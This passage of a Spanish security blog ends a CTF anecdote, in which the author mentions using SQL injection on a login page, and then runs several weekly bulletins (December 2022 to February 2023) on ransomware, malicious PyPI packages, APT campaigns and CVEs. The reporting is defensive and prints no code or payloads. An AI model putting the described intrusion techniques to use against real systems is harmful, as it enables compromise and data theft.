con un bonito logo de Telefónica Tech... 3. Reto forense Un reto forense implica analizar archivos y sistemas con el fin de recuperar información (como datos encriptados o borrados), identificar intrusos, atacantes o a los autores delitos informáticos. En este caso se trataba de un par de ficheros supuestamente volcados de memoria o imágenes de disco… Sin un teclado ni las aplicaciones adecuadas ni me planteé resolver el reto en ese momento, pero siempre podía volver más tarde si era necesario. Martina Matarí, responsable de servicios de seguridad ofensiva de Telefónica Tech, durante su ponencia. 4. Reto web Visto lo anterior decidí ir a por el último, el reto web. Suelen incluir la identificación y explotación de vulnerabilidades en sitios web, la recuperación de información sensible o el análisis de paquetes de red. Quizá el más accesible sin herramientas. El reto web se iniciaba también con una pantalla de ‘login’ que pedía usuario y contraseña. Apliqué un SQL injection que hizo su magia y me devolvió un listado de usuarios y contraseñas que hubo que descifrar. En el enunciado del reto se mencionaba un panel de control. Lo busqué, pero tenía protección contra SQLi, por lo que no puedo aplicar un SQL injection. Pero como tengo las credenciales anteriores accedo sin problema. Ahora sí, y el ejercicio queda completado. Cyber Security Cómo funciona Lokibot, el malware que utiliza Machete para robar información y credenciales de acceso 29 de junio de 2022 Las claves: conocimiento, metodologías y herramientas En este punto tres retos ya tenían una solución, por lo que me fui a comer con los compañeros y me olvidé de la competición. ¡Cual fue mi sorpresa al recibir un correo invitándome a recoger el premio por haber puntuado más alto de forma presencial! Me acerqué a recoger el premio y la historia de cómo había ganado usando el teléfono causó mucho impacto. El hecho de haber resuelto esos desafíos desde el teléfono es gracias a tener las metodologías claras. En este sentido tuve el placer de aprender del gran Francisco Martín, que siempre nos insistió en dos cosas: Las herramientas de botón gordo solo se usan cuando tienes claro lo que hacen y eres capaz de hacerlo sin ellas. Fuzzear es tu amigo: fuzzealo todo. Bromas aparte, entender qué hacemos, cómo lo hacemos y por qué lo hacemos es fundamental para los que nos dedicamos a IT. Así que aprovecho para animar a los futuros profesionales a aprender, a investigar y a no quedarse en la superficie de lo que nos enseñan. Porque, quien sabe, quizá eso os permita lograr cosas que nadie se espera.
9 de febrero de 2023
Boletín semanal de Ciberseguridad, 28 de enero – 3 de febrero
LockBit Green: nueva variante de LockBit Recientemente, investigadores de vx-underground han detectado que los gestores del ransomware LockBit están utilizando una nueva variante de ransomware, denominada LockBit Green. Esta nueva variante sería la tercera empleada por el grupo, tras su inicio con Lockbit Red, y su evolución posterior a LockBit Black (también denominado LockBit 3.0). Varios investigadores han analizado las muestras disponibles de LockBit Green, pudiendo observar que esta nueva variante se basa en el código fuente de Conti. De su análisis destacan que la nota de rescate empleada es la de LockBit 3.0, y que ya no se utiliza la extensión .lockbit, sino una aleatoria, al cifrar los archivos en el sistema de la víctima. Asimismo, por parte del equipo de PRODAFT han compartido Indicadores de Compromiso (IoCs) y una regla Yara de la nueva variante. Más info → * * * GitHub revoca certificados comprometidos para Desktop y Atom Github ha tomado la decisión de revocar una serie de certificados utilizados para sus aplicaciones Desktop y Atom después de que se vieran comprometidos en un incidente de seguridad en diciembre. Según la propia compañía, el acceso no autorizado ocurrido en diciembre no habría afectado a los servicios de la plataforma, sin embargo, un grupo de certificados se habría exfiltrado como resultado. Estos certificados están protegidos por contraseña, y por el momento no se habría detectado ningún uso malicioso de los mismos. La anulación de estos certificados invalidará las versiones de GitHub Desktop para Mac 3.0.2 a 3.1.2 y Atom 1.63.0 a 1.63.1. Se recomienda a los usuarios de estas versiones actualizar a la más reciente en caso de Desktop, y volver a versiones anteriores en caso de Atom. Los cambios entrarán en vigor el día 2 de febrero. Más info → * * * PoC disponible para vulnerabilidad en KeePass KeePass ha descubierto recientemente una vulnerabilidad en su software para la cual ya se ha lanzado un PoC. El fallo, identificado como CVE-2023-24055, permite a los actores amenaza con acceso de escritura en un sistema, alterar el archivo de configuración XML e inyectar malware para exportar la base de datos con los usuarios y contraseñas en texto plano. Cuando un usuario accede a KeePass e introduce la contraseña maestra para abrir la base de datos, se activa en segundo plano la regla de exportación y el contenido se guarda en un archivo al cual tienen acceso los atacantes. Si bien KeePass describió el problema en 2019 sin calificarlo como vulnerabilidad, los usuarios solicitan que el producto incluya un mensaje de confirmación antes de exportar o poder deshabilitar la función. Desde Bleeping Computer recomiendan asegurarse de que los usuarios sin privilegios no tengan acceso a ningún archivo de la aplicación y crear un archivo de configuración. Más info → * * * Dos nuevas vulnerabilidades en dispositivos CISCO Investigadores de Trellix han alertado de dos vulnerabilidades en dispositivos Cisco. La primera de ellas, identificada como CVE-2023-20076 y con un CVSS según fabricante de 7.2, permitiría a un atacante no autenticado inyectar comandos de forma remota en diversos dispositivos. El segundo error, por ahora identificado con el ID de error de Cisco CSCwc67015, permitiría a un atacante ejecutar código de forma remota y sobrescribir archivos existentes. Si bien ambos fallos se identificaron originalmente en los routers de Cisco ISR 4431, afectarían igualmente a otros dispositivos: 800 Series Industrial ISRs, CGR1000 Compute Modules, IC3000 Industrial Compute Gateways, dispositivos basados en IOS-XE configurados con IOx; routers IR510 WPAN Industrial y Cisco Catalyst Access points (COS-APs). Cisco habría lanzado actualizaciones de seguridad para la primera vulnerabilidad mencionada, y los investigadores urgen a las organizaciones afectadas a actualizar a la última versión de firmware disponible, además de deshabilitar el framework IOx de no ser necesario su uso. Más info → * * * Campaña de Lazarus contra empresas energéticas y del sector sanitario La empresa WithSecure ha publicado una extensa investigación sobre la última campaña de la APT Lazarus, supuestamente respaldada por Corea del Norte. La campaña ha recibido el nombre de “No Pineapple!” y en ella el grupo ha conseguido robar 100GB de datos de empresas de investigación médica, ingeniería y energía, entre otras. Según WithSecure Lazarus aprovechó las vulnerabilidades CVE-2022-27925 y CVE-2022-37042 en Zimbra para colocar una webshell en el servidor de correo de las víctimas. Una vez dentro del sistema usaron diversas herramientas como el backdoor Dtrack y una nueva versión del malware GREASE, que abusa de la vulnerabilidad PrintNightmare. WithSecure pudo atribuir la campaña a Lazarus, además de por repetir TTPs asociadas al grupo, gracias a que descubrió que las webshells se comunicaban con una IP localizada en Corea del Norte. Más info (PDF) → Foto de apertura: Brecht Corbeel / Unsplash
3 de febrero de 2023
Boletín semanal de Ciberseguridad, 21 – 27 de enero
Killnet apunta contra objetivos en España Esta semana el grupo hacktivista Killnet anunció una campaña de ataques contra Alemania, dando lugar a la realización de ataques de Denegación de Servicio Distribuido (DDoS) que dejaron inoperativas durante el miércoles las páginas webs del gobierno de Alemania, el Bundestag, varios bancos y aeropuertos del país. Tras estos ataques, el grupo publicó un comentario en su canal de Telegram donde señalaba directamente España como posible objetivo de sus próximos ataques, dejando el siguiente mensaje “España – que te j**** a ti también, pero contigo todo será más fácil y rápido” (traducido al español desde el mensaje original). A raíz de este mensaje, otros participantes dentro del canal de Telegram señalaron expresamente a dos empresas españolas, enunciando que serían supuestamente “fáciles” de atacar. Por el momento no se ha tenido constancia de la realización de ataques contra empresas de infraestructura crítica u organismos gubernamentales españoles. * * * Corregida 0-day en Apple que afectaba a iPhones e iPads antiguos Apple ha publicado un aviso de seguridad donde aborda parches para una vulnerabilidad 0-day activamente explotada en iPhones e iPads antiguos. La vulnerabilidad, catalogada como CVE-2022-42856 con un CVSSv3 de 8.8, podría permitir a un atacante procesar contenido web creado con fines maliciosos para lograr la ejecución de código arbitrario, debido a una confusión de tipos en el motor del navegador web WebKit de Apple. Esta vulnerabilidad fue publicada en el mes de diciembre para otros productos de Apple, estando ahora disponible para las versiones más antiguas: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, e iPod Touch (6ª generación). Desde Apple señalan en su aviso que se tiene constancia de la explotación activa de esta vulnerabilidad en versiones de iOS anteriores a iOS 15.1. El 14 de diciembre la CISA la incluyó dentro de su catálogo de vulnerabilidades explotadas. Más info → * * * Corregidas vulnerabilidades en VMware VMware ha lanzado parches de seguridad para abordar una serie de vulnerabilidades en vRealize Log Insight, ahora conocido como VMware Aria Operations for Logs. En primer lugar, la vulnerabilidad identificada como CVE-2022-31703 y CVSS 7.5, trata de un fallo transversal de directorio mediante el que los atacantes pueden inyectar archivos en el sistema afectado y lograr la ejecución remota de código. Por otro lado, la CVE-2022-31704, con CVSS 9.8, es una vulnerabilidad de control de acceso que puede ser aprovechada para la ejecución remota de código. Finalmente, la compañía ha corregido una vulnerabilidad de deserialización, identificada como CVE-2022-31710 y CVSS 7.5, la cual puede desencadenar una DoS y la CVE-2022-31711, con CVSS 5.3, que trata sobre un fallo de divulgación de información. Más info → * * * PY#RATION: nuevo RAT basada en Python El equipo de investigadores de Securonix ha descubierto una campaña de ataque de un nuevo malware basado en Python con capacidades de troyano de acceso remoto (RAT). Este malware, al que han denominado PY#RATION, está en desarrollo permanente, ya que desde su detección en agosto de 2022 ha pasado de la versión 1.0 a la 1.6.0. PY#RATION se distribuye mediante correos de phishing que contienen archivos adjuntos .ZIP dentro de los cuales hay dos archivos .lnk de acceso directo bajo apariencia de imágenes (front.jpg.lnk y back.jpg.lnk). Al ejecutarse estos accesos directos, la víctima ve la imagen de una licencia de conducir británica por el anverso y el reverso mientras ejecuta el código malicioso para ponerse en contacto con el C2, el cual descarga a su vez dos archivos adicionales al directorio temporal del usuario. Una vez ejecutado PY#RATION este es capaz de realizar enumeración de red, realizar transferencias de archivos, registro de teclas, robar datos del portapapeles, extraer contraseñas y cookies de los navegadores web o ejecutar comandos de shell, entre otras capacidades. Por último, desde Securonix estiman que esta campaña está dirigida principalmente contra víctimas en Reino Unido o América del Norte. Más info → * * * Microsoft planea bloquear los archivos XLL provenientes de Internet Después de deshabilitar las macros en archivos de Office descargados de Internet para impedir la propagación de malware, el siguiente paso de Microsoft en su lucha contra los archivos maliciosos será bloquear los archivos XLL provenientes de Internet, principalmente adjuntos en correos electrónicos. Los archivos XLL son librerías dinámicas de Excel que proporcionan características adicionales a Excel (cajas de diálogo o barras de herramientas, entre otros). Al tratarse de archivos ejecutables, son muy útiles para los actores amenaza que los incluyen en sus campañas de phishing para descargar malware en el equipo de la víctima con un solo click. Según Microsoft, la medida está siendo implementada y llegará a los usuarios de manera general en marzo. Más info →
27 de enero de 2023
Boletín semanal de Ciberseguridad, 14 – 20 de enero
Vulnerabilidades críticas en los router Netcomm y TP-Link Se han descubierto una serie de vulnerabilidades en los routers Netcomm y TP-Link. Por un lado, los fallos, identificados como CVE-2022-4873 y CVE-2022-4874, se tratan de un caso de buffer overflow y de omisión de autenticación que permitirían la ejecución remota de código. El investigador que las descubrió, Brendan Scarvell, ha publicado una PoC para ambas. Los modelos afectados de router serían Netcomm NF20MESH, NF20 y NL1902 que ejecuten versiones de firmware anteriores a R6B035. Por otro lado, el CERT/CC detalló dos vulnerabilidades que afectan a los router TP-Link WR710N-V1-151022 y Archer-C5-V2-160201, que podrían causar divulgación de información (CVE-2022-4499) y ejecución remota de código (CVE-2022-4498). Más info → * * * PoC para múltiples vulnerabilidades en plugins de Wordpress Investigadores de Tenable han publicado los detalles de tres nuevas vulnerabilidades en plugins para la plataforma Wordpress, incluyendo pruebas de concepto (PoC) de todas ellas. La primera, catalogada como CVE-2023-23488 con una puntuación CVSS de 9.8, se trataría de una vulnerabilidad de inyección SQL sin autenticación en el plugin Paid Membership Pro; la segunda, identificada como CVE-2023-23489 con la misma puntuación y del mismo tipo que la anterior, afectaría al plugin Easy Digital Downloads; la tercera, CVE-2023-23490 con una puntuación CVSS de 8.8 y también de tipo inyección de SQL, afectaría al plugin Survey Maker. Los autores de los plugins habrían sido notificados en diciembre de 2022 y habrían lanzado actualizaciones de seguridad corrigiendo estos problemas, de forma que las últimas versiones disponibles ya no serían vulnerables. Más info → * * * Hook: nuevo troyano bancario contra dispositivos Android Investigadores de ThreatFabric han descubierto un nuevo troyano bancario en Android llamado Hook. De acuerdo con el informe publicado, Hook habría sido puesto a la venta por el mismo desarrollador que el troyano bancario en Android Ermac, contando si bien, con más capacidades que su predecesor, con el que comparte gran parte de su código fuente. El aspecto más destacado de Hook es que incluye un módulo VNC (virtual network computing) que permite tomar el control en tiempo real de la interface comprometida. Por último, cabe destacar que España es el segundo país con más aplicaciones bancarias amenazadas por Hook solo por detrás de Estados Unidos, según el informe de ThreatFabric. Más info → * * * Descubierto malware oculto en paquetes del repositorio PyPI Investigadores de Fortinet han localizado en el repositorio PyPI (Python Package Index) la existencia de tres paquetes que contienen código malicioso con el fin de infectar los sistemas de los desarrolladores con malware del tipo infostealer. Los tres paquetes, que han sido subidos a la plataforma por el mismo usuario con el nickname Lolip0p, se llaman Colorslib, httpslib y libhttps, respectivamente. Fortinet resalta que como gran novedad en este tipo de ataques a la cadena de suministro el actor amenaza no ha tratado de incluir malware en copias maliciosas de paquetes legítimos, sino que ha creado sus propios proyectos invirtiendo mucho esfuerzo en hacerlos parecer confiables. Fortinet descubrió que el archivo de setup de los tres paquetes es idéntico y que trata de ejecutar un PowerShell que descarga un archivo malicioso. Según las estadísticas de PyPI, en conjunto estos tres paquetes se habrían descargado 549 veces hasta el momento. Más info → * * * NortonLifeLock comunica un incidente con su gestor de contraseñas Gen Digital, compañía dueña de NortonLifeLock, ha comenzado a enviar, a un número no revelado de sus usuarios, un comunicado en el que se les informa de que un tercero no autorizado ha podido acceder a sus cuentas en Norton Password Manager y exfiltrar nombres, apellidos, números de teléfono y dirección de correo electrónico. Además, en la notificación oficial enviada a la Fiscalía de Vermont, Norton explica que sus sistemas no han sido comprometidos o abusados, y que el incidente se debe a que el atacante reutilizó los nombres de usuario y contraseñas disponibles en alguna base de datos a la venta en la dark web. Esta afirmación se sustenta en el hecho de que a finales de diciembre Norton detectó un sustancioso e inusual aumento del número de intentos fallidos de login en sus sistemas, lo que indica que los atacantes estaban tratando de acceder probando contraseñas comprometidas en otro servicio. El incidente vuelve a poner de manifiesto la necesidad de una correcta política de contraseñas con claves únicas para cada servicio online. Más info → Foto principal: Souvik Banerjee / Unsplash
20 de enero de 2023
Boletín semanal de Ciberseguridad, 7 – 13 de enero
Microsoft corrige 98 vulnerabilidades en su Patch Tuesday Microsoft ha publicado su boletín de seguridad correspondiente con el mes de enero, donde corrige un total de 98 vulnerabilidades. Entre estas destaca por un lado una vulnerabilidad 0-day activamente explotada, la cual ha sido identificada como CVE-2023-21674 con un CVSSv3 de 8.8, siendo una vulnerabilidad de elevación de privilegios de Advanced Local Procedure Call (ALPC) de Windows, que podría llevar a un posible atacante a obtener privilegios de SYSTEM. Por otro lado, también es reseñable la vulnerabilidad CVE-2023-21549 (CVSSv3 8.8) de elevación de privilegios del servicio SMB Witness de Windows, debido a que habría sido ya divulgada públicamente, su explotación por parte de un posible atacante podría dar lugar a que ejecutara funciones RPC que están restringidas solo a cuentas con privilegios. Asimismo, cabe destacar también que dentro de las 98 vulnerabilidades corregidas, once de ellas han sido catalogadas por Microsoft como críticas, en concreto las identificadas como: CVE-2023-21743, CVE-2023-21743, CVE-2023-21561, CVE-2023-21730, CVE-2023-21556, CVE-2023-21555, CVE-2023-21543, CVE-2023-21546, CVE-2023-21679, CVE-2023-21548, y CVE-2023-21535. Leer más → * * * Vulnerabilidad crítica en routers Cisco sin soporte Cisco ha emitido un aviso de seguridad en donde alerta sobre una vulnerabilidad crítica que afecta a múltiples routers de la compañía que se encuentran al final de su vida útil y de la cual existe una PoC pública, aunque no se conoce por el momento intentos de explotación. En concreto, esta falla de seguridad registrada como CVE-2023-20025, con un CVSSv3 de 9.0 según fabricante, puede desencadenar en una omisión de autenticación causada por una validación incorrecta de la entrada del usuario dentro de los paquetes HTTP entrantes. Actores maliciosos no autenticados podrían explotarla remotamente enviando una solicitud HTTP especialmente diseñada a la interfaz de administración de los dispositivos vulnerables. Asimismo, este fallo de seguridad podría encadenarse junto con otra nueva vulnerabilidad, CVE-2023-20026, que posibilitaría la ejecución de código arbitrario. En último lugar, cabe indicar que los dispositivos afectados serían los modelos de router Cisco Small Business RV016, RV042, RV042G y RV082. Desde Cisco señalan que no publicarán parche, pero como medida paliativa se recomienda deshabilitar la interfaz de administración y bloquear el acceso a los puertos 443 y 60443 para bloquear los intentos de explotación. Leer más → * * * IcedID tarda menos de 24 horas en comprometer el Directorio Activo Investigadores de Cybereason han publicado un análisis del troyano bancario IcedID, también conocido como BokBot, en el que destacan la rapidez con la que puede comprometer el sistema de una víctima. En el informe Cybereason advierte de que IcedID tarda menos de una hora desde la infección inicial hasta que comienza los movimientos laterales en el sistema y que necesita menos de 24 horas para comprometer el Directorio Activo para, finalmente, comenzar la exfiltración de datos en apenas 48 horas. En el informe también se pone de relieve que IcedID ha cambiado su vector de acceso inicial ya que al principio se distribuía a través de archivos de Office con macros maliciosas, pero tras las medidas de protección contra macros implementadas por Microsoft ha pasado a ser distribuido a través de archivos ISO y LNK. Por último, es reseñable destacar que IcedID comparte tácticas, técnicas y procedimientos (TTPs) con grupos como Conti y Lockbit. Leer más → * * * Vulnerabilidad explotada activamente en Control Web Panel (CWP) Shadowserver Foundation y GreyNoise han detectado la explotación activa de la vulnerabilidad crítica en Control Web Panel (CWP) catalogada como CVE-2022-44877 con un CVSSv3 de 9.8. La vulnerabilidad, que fue descubierta por el investigador Numan Türle, fue parcheada en el mes de octubre, si bien, no ha sido hasta la semana pasada cuando se han publicado más detalles de esta junto con una Prueba de Concepto (PoC). Según los expertos, a partir del día 6 de enero es cuando se han detectado los primeros intentos de explotación de esta vulnerabilidad, la cual permitiría a un actor amenaza no autenticado realizar una ejecución remota de código en servidores vulnerables o una escalada de privilegios. En concreto, este fallo de seguridad afecta a versiones de CWP7 anteriores a la 0.9.8.1147. Cabe destacar que desde GreyNoise han observado cuatro direcciones IP únicas intentado explotar esta vulnerabilidad. Leer más → * * * Última versión de SpyNote dirigida contra clientes bancarios Investigadores de ThreatFabric han informado de la actividad reciente de la familia de malware SpyNote, también conocida como SpyMax. La última variante conocida ha sido catalogada como SpyNote.C, la cual fue vendida por su desarrollador mediante Telegram, bajo el nombre de CypherRat, entre agosto de 2021 y octubre de 2022, acumulando, de acuerdo con los investigadores un total de 80 clientes. Si bien, en octubre de 2022, el código fuente fue compartido en GitHub, hecho que generó un aumento muy significativo del número de muestras detectadas de este malware. Entre estas últimas muestras se ha observado cómo SpyNote.C se ha dirigido contra aplicaciones bancarias, haciéndose pasar por apps de bancos como HSBC, Deutsche Bank, Kotak Bank, o BurlaNubank, además de por otras aplicaciones conocidas como Facebook, Google Play, o WhatsApp. Es reseñable el hecho de que SpyNote.C combina capacidades de spyware y de troyano bancario, siendo capaz de utilizar la API de la cámara de los dispositivos para grabar y enviar vídeos a su C2, obtener información de GPS y ubicación de red, robar credenciales de redes sociales, o exfiltrar credenciales bancarias, entre otras capacidades. Leer más →
13 de enero de 2023
Boletín semanal de Ciberseguridad, 31 de diciembre – 6 de enero
Vulneran la cadena de dependencia de PyTorch PyTorch, un popular framework de machine learning de código abierto, ha advertido a los usuarios que instalaron PyTorch-nightly entre el 25 y el 30 de diciembre de 2022 que desinstalen el framework y la librería 'torchtriton' debido a un compromiso exitoso a través de un ataque por confusión de dependencias. La librería maliciosa 'torchtriton' en PyPI comparte nombre con una librería oficial publicada en el repositorio de PyTorch-nightly, provocando que el paquete malicioso se introduzca en los sistemas de los usuarios en lugar del legítimo con el objetivo de robar información sensible de la víctima. PyTorch ha renombrado la librería 'torchtriton' a 'pytorch-triton' y ha reservado un paquete ficticio en PyPI para evitar ataques similares. Este problema no afecta a los usuarios de las versiones estables de PyTorch. Más info → * * * Synology corrige una vulnerabilidad crítica Synology ha abordado una vulnerabilidad de gravedad máxima que afecta a los servidores VPN Plus Server. La vulnerabilidad, identificada como CVE-2022-43931 y CVSS de 10.0, puede ser explotada en ataques de baja complejidad sin requerir privilegios en los routers o la interacción del usuario, permitiendo a un atacante remoto la ejecución de comandos arbitrarios. La compañía ha publicado correcciones para las vulnerabilidades y recomienda a los usuarios actualizar el servidor VPN Plus para SRM a la última versión. Más info → * * * Nueva campaña de Raspberry Robin Investigadores de Security Joes han detectado nuevos ataques del framework Raspberry Robin contra compañías de seguros e instituciones financieras en Europa. La actividad de Raspberry Robin fue recientemente documentada también por el equipo de TrendMicro, si bien, los investigadores de Security Joes han podido observar una nueva versión del malware más compleja. El mecanismo de descarga se ha actualizado, teniendo nuevas capacidades anti-análisis. Asimismo, los atacantes han comenzado a recopilar más datos de las máquinas de las víctimas. Sobre este último punto destacan que, si bien antes la baliza C2 contenía una URL con nombre de usuario y nombre de host en texto sin formato, ahora contiene otros datos como el nombre del procesador y datos adicionales de los dispositivos de vídeo disponibles en la máquina, cifrando a su vez este perfil de las máquinas de la víctima con RC4. Finalmente cabe destacar que en esta ocasión las víctimas serían organizaciones de habla portuguesa y española. Más info → * * * MasquerAds: campaña de distribución de malware con Google Ads Investigadores de Guardio han alertado de una campaña de distribución de malware a través de Google Ads a la que han denominado MasquerAds. Los anuncios, supuestamente promocionando programas legítimos populares como Zoom, Slack, AnyDesk, Blender, Audacity o Brave, apuntan a una web benigna y aprobada por el sistema de anuncios de Google, sin embargo, una vez se accede al enlace, se redirige al usuario a un sitio distinto donde finalmente descargaría el malware alojado en servicios legítimos como Github, Dropbox o Discord. Desde Guardio atribuyen esta campaña al grupo conocido como Vermux, e indican que habría afectado en su mayoría a usuarios en Estados Unidos y Canadá. Entre las variantes de malware observadas en su investigación se incluyen mineros de criptomonedas y los stealers Racoon y Vidar. El uso de anuncios de Google en este tipo de campañas parece haber aumentado recientemente, llevando incluso al FBI a realizar una alerta al respecto. Más info → * * * Zoho corrige una vulnerabilidad crítica en ManageEngine Zoho ha abordado un fallo de seguridad que afecta a varios productos de ManageEngine. El fallo, identificado como CVE-2022-47523, es una vulnerabilidad de inyección SQL que afecta a Password Manager Pro, el software de administración de acceso privilegiado PAM360 y la solución de gestión de sesiones privilegiadas Access Manager Plus. La explotación exitosa proporcionaría a un atacante acceso no autenticado a la base de datos back-end, permitiendo realizar cualquier tipo de consulta. Desde Zoho se recomienda actualizar los productos afectados a su última versión lo antes posible. Más info →
9 de enero de 2023
Boletín semanal de Ciberseguridad, 24 – 30 de diciembre
LastPass confirma el robo de contraseñas de clientes LastPass ha anunciado que su sistema de almacenamiento en la nube fue vulnerado mediante claves de acceso robadas en el incidente del pasado mes de agosto, donde los atacantes tuvieron acceso a información técnica y código fuente de la compañía. Aprovechando estas claves, los autores del ataque lograron robar información de cuentas de clientes y datos almacenados en el vault, incluyendo contraseñas y notas. Si bien los datos del vault están cifrados, la empresa ha avisado a sus clientes que los que atacantes podrían intentar hacer fuerza bruta contra sus contraseñas maestras y obtener acceso a toda la información almacenada. Más info → * * * BlueNoroff incorpora nuevas técnicas para evitar las medidas MotW de Windows Un equipo de investigadores ha identificado nuevos métodos para evadir las medidas de protección Mark of the Web (MotW) de Windows, los cuales han sido adoptados por el grupo conocido como BlueNoroff. Este actor malicioso, asociado con el grupo Lazarus y conocido por ataques anteriores para robar criptodivisas, habría incorporado nuevas técnicas para evitar el mensaje de aviso que Windows muestra a los usuarios al tratar de abrir un archivo descargado de internet. Para lograrlo, habría hecho uso de los formatos de archivo con extensiones .ISO y .VHD. Si bien la investigación se originó a partir de una empresa de Emiratos Árabes Unidos afectada por este grupo, la nomenclatura de los dominios y documentos empleados en la cadena de ataque parecería indicar un interés más concreto sobre compañías japonesas, concretamente en el sector financiero. Más info → * * * Datos de 400 millones de usuarios de Twitter a la venta Recientemente, un actor malicioso denominado Ryushi ha puesto a la venta en un conocido foro clandestino una base de datos de 400 millones de usuarios de Twitter. El vendedor ha proporcionado una muestra de 1.000 cuentas, incluida información privada de usuarios destacados como Donald Trump Jr y Brian Krebs, como prueba de sus afirmaciones. Asimismo, el vendedor afirma que los datos fueron extraídos a través de una vulnerabilidad e incluyen correos electrónicos y números de teléfono de famosos, políticos, empresas y usuarios normales. El vendedor también invita a Twitter y a Elon Musk a comprar los datos para evitar demandas por GDPR, aludiendo a que la Comisión Irlandesa de Protección de Datos (DPC) ha abierto una investigación tras conocerse una filtración de datos que afecta a más de 5,4 millones de usuarios de Twitter que se obtuvieron aprovechando una vulnerabilidad de la API que Twitter había corregido el pasado mes de enero de 2022. Más info → * * * EarSpy: nuevo ataque de eavesdropping Investigadores de cinco universidades estadounidenses han desarrollado EarSpy, un ataque de eavesdropping para dispositivos Android capaz de reconocer el sexo y la identidad de quien llama. EarSpy es capaz de capturar las lecturas de datos de los sensores de movimiento causadas por las reverberaciones de los altavoces de los dispositivos móviles. Aunque antes se consideraba demasiado débil para generar vibraciones suficientes para este tipo de ataque, los smartphones modernos con altavoces estéreo más potentes y sensores de movimiento sensibles pueden registrar incluso pequeñas resonancias. En las pruebas realizadas con un dispositivo OnePlus 7T y OnePlus 9, la precisión de la identificación de género osciló entre el 77,7% y el 98,7%, la precisión de la identificación de llamadas entre el 63,0% y el 91,2%, y la precisión del reconocimiento de voz entre el 51,8% y el 56,4%. El volumen del usuario, el hardware del dispositivo y el movimiento pueden afectar a la precisión del ataque. Android 13 ha introducido una restricción a la recopilación de datos de sensores sin permiso, pero esto solo reduce la precisión alrededor del 10%. Más info → * * * Netgear corrige vulnerabilidades que afectan a varios modelos de routers El fabricante de routers Netgear ha publicado dos avisos de seguridad en donde informan sobre el descubrimiento de vulnerabilidades de criticidad alta en varios de sus modelos de routers. Si bien no se ha asignado ningún CVE, ni tampoco detallado por parte de Netgear qué componente es el afectado, sí que se destaca que uno de ellos se trata de un fallo de seguridad de desbordamiento de búfer previo a la autenticación. El aprovechamiento de este tipo de vulnerabilidades puede permitir desde realizar una denegación de servicio, hasta la ejecución de código arbitrario, sin requerir permisos o interacción por parte del usuario. Cabe indicar que, entre los productos afectados, se incluyen varios modelos de routers Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6) y Wireless AC. En último lugar, cabe reseñar que el aprovechamiento de la segunda de las vulnerabilidades podría permitir realizar un ataque dirigido de DDoS a routers modelos Wireless AC Nighthawk y Wireless AX Nighthawk (WiFi 6). Más info →
30 de diciembre de 2022
Boletín semanal de Ciberseguridad, 17 – 23 de diciembre
SentinelOne: paquete de Python en PyPI malicioso El equipo de investigadores de ReversingLabs ha publicado una investigación en la que informan haber identificado un paquete de Python en PyPI que se hace pasar por el cliente SDK legítimo de la firma de ciberseguridad SentinelOne. Según los investigadores, actores maliciosos habrían creado un troyano denominado con el mismo nombre de la compañía SentinelOne con el fin de engañar a las víctimas. Asimismo, dicho software malicioso ofrece una funcionalidad legítima, que es la de acceder a la API de SentinelOne desde otro proyecto. Sin embargo, este paquete lleva de forma ofuscada un software malicioso dedicado a la exfiltración de datos confidenciales de sistemas comprometidos. ReversingLabs ha indicado haber detectado cinco paquetes con nombres similares subidos por los mismos autores entre el 8 y el 11 de diciembre de 2022, y calcula que se han descargado hasta en un total de 1.000 ocasiones. Más info → * * * OWASSRF: nuevo método de explotación de Microsoft Exchange El equipo de CrowdStrike ha descubierto un nuevo método de explotación de Microsoft Exchange que elude las mitigaciones de ProxyNotShell. Esta nueva manera de aprovechar el fallo, a la que han denominado OWASSRF, fue detectada mientras los investigadores analizaban los vectores de entrada del ransomware Play, ya que sospechaban que los gestores detrás de dicho software malicioso explotaban ProxyNotShell (CVE-2022-41040 y CVE-2022-41082). Sin embargo, no se detectó evidencia de explotación de la primera vulnerabilidad (CVE-2022-41040) y sí de la segunda (CVE-2022-41082). De acuerdo con CrowdStrike, el fallo de seguridad, el cual serviría como acceso inicial para explotar posteriormente la CVE-2022-41082, ha sido catalogado como CVE-2022-41080, con un CVSSv3 de 9.8, siendo este un fallo de escalada de privilegios a través del punto final de la aplicación web de Outlook (OWA). Cabe destacar además que, durante la investigación, Dray Agha, investigador de amenazas de Huntress Labs, descubrió las herramientas de un atacante expuestas en un repositorio abierto. Dentro de estas se incluía una PoC para el exploit de Exchange de Play, lo que permitió a CrowdStrike replicar los ataques. Más info → * * * Achilles: vulnerabilidad en Gatekeeper de Apple Microsoft ha desvelado los detalles de una vulnerabilidad en macOS que permitiría eludir las restricciones de ejecución de aplicaciones del mecanismo de seguridad Gatekeeper de Apple. La vulnerabilidad, que ha sido catalogada como CVE-2022-42821, con un CVSS de 5.5, fue descubierta por el equipo de Microsoft en el mes de julio, quedando solucionada con las actualizaciones de la semana pasada en macOS 13 (Ventura), macOS 12.6.2 (Monterey), y macOS 1.7.2 (Big Sur). El mecanismo de seguridad Gatekeeper consiste en verificar las aplicaciones descargadas de Internet con el fin de ver si están aprobadas por Apple, enviando un mensaje al usuario para confirmar antes de iniciarlas, o emitiendo una alerta informando de que no se puede ejecutar la aplicación al no ser de confianza. Esta verificación se realiza mediante la comprobación del atributo con el nombre com.apple.quarantine, que los navegadores web asignan a los archivos descargados. La vulnerabilidad detectada, a la que también se le ha denominado como Achilles, explota el modelo de permisos de Listas de Control de Acceso (ACL) agregando permisos muy restrictivos a un archivo descargado, lo que impide que Safari condiv el atributo com.apple.quarantine y que podría permitir a un atacante crear una aplicación maliciosa que podría utilizarse como vector de acceso inicial de malware u otras amenazas. Más info → * * * Botnet Glupteba activa de nuevo Investigadores de Nozomi Networks han detectado la vuelta a la actividad de la botnet Glupteba, después de que Google interrumpiera su operación hace un año. De acuerdo con los investigadores, la última campaña habría comenzado en el mes de junio del presente año y aún se encontraría activa. Glupteba es un backdoor distribuido mediante redes de pago por instalación (PPI) en instaladores infectados o fallos de software. Está habilitado para Blockchain, infecta dispositivos Windows para extraer criptomonedas, robar credenciales de usuario, cookies, e implementar proxys en dispositivos IoT y sistemas Windows. No obstante, lo más destacado de Glupteba es que utiliza la cadena de bloques de Bitcoin para distribuir sus dominios de Command and Control (C2), este hecho le hace muy resistente a las eliminaciones, ya que no se puede borrar ni censurar una transacción de Bitcoin validada. A tal respecto, desde Nozomi han observado como el uso de direcciones de Bitcoin ha ido en aumento, pues en su primera campaña, datada en el año 2019 tan solo empleó una dirección, mientras que en la última se han detectado hasta diecisiete direcciones diferentes. Más info →
23 de diciembre de 2022
